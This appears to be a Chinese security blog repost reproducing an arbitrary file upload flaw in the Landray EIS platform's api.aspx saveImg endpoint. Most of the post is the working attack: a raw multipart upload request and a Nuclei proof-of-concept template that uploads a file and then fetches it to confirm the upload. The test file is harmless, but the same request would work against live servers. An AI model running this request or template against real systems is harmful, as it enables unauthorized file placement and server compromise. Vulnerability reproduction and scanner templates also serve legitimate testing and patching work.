【漏洞复现】蓝凌EIS智慧协同平台api.aspx任意文件上传漏洞

admin

138876
文章

114
评论

2023年10月24日23:59:34评论150 views字数 1811阅读6分2秒阅读模式

漏洞概述

蓝凌EIS是蓝凌18年中大客户办公应用与阿里钉钉相融合的一款功能全、体验好、开通即用、配置灵活、软硬一体的租赁版OA系统。此系统api.aspx接口的saveImg存在任意文件上传漏洞。

【漏洞复现】蓝凌EIS智慧协同平台api.aspx任意文件上传漏洞

漏洞复现

POST /eis/service/api.aspx?action=saveImg HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/form-data; boundary=----4225820000370152680749129212 ------4225820000370152680749129212Content-Disposition: form-data; name="file"filename="night.txt"Content-Type: text/html Night------4225820000370152680749129212--

【漏洞复现】蓝凌EIS智慧协同平台api.aspx任意文件上传漏洞

NUCLEI POC

【漏洞复现】蓝凌EIS智慧协同平台api.aspx任意文件上传漏洞

id: landray-eis-api-saveimg-fileupload info:  name: 蓝凌eis智慧协同平台任意文件上传  author: YGnight  severity: high  description: description  reference:    - https://  metadata:    verified: true    max-request: 1  requests:  - raw:      - |        POST /eis/service/api.aspx?action=saveImg HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9        Accept-Encoding: gzip, deflate        Accept-Language: zh-CN,zh;q=0.9        Connection: close        Content-Type: multipart/form-data; boundary=----4225820000370152680749129212         ------4225820000370152680749129212        Content-Disposition: form-data; name="file"filename="night.txt"        Content-Type: text/html                Night        ------4225820000370152680749129212--                - |        GET {{filename}} HTTP/1.1        Host: {{Hostname}}     req-condition: true    extractors:      - type: dsl        part: body_1        name: filename        dsl:          - body        internal: true     matchers-condition: and    matchers:      - type: status        status:          - 200      - type: word        part: body_2        words:          - "Night"

原文始发于微信公众号（night安全）：【漏洞复现】蓝凌EIS智慧协同平台api.aspx任意文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【漏洞复现】蓝凌EIS智慧协同平台api.aspx任意文件上传漏洞

CVE-2025-27218｜Sitecore CMS远程代码执行漏洞

CentreStack 反序列化漏洞 (CVE-2025-30406)

Windows提权漏洞CVE-2025-21204

漏洞预警博华X龙防火墙系统 arp_scan文件读取漏洞

网安人的咯噔文学|CVE-2025-404NotFound？

CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升

Windows 提权漏洞速报：CVE-2025-21204

Jupyter Remote Desktop未授权访问漏洞CVE-2025-32428

F5 BIG-IP命令注入漏洞CVE-2025-23239

三星路由器WLAN-AP-WEA453e-未授权RCE等多个漏洞 POC

发表评论

在线咨询

微信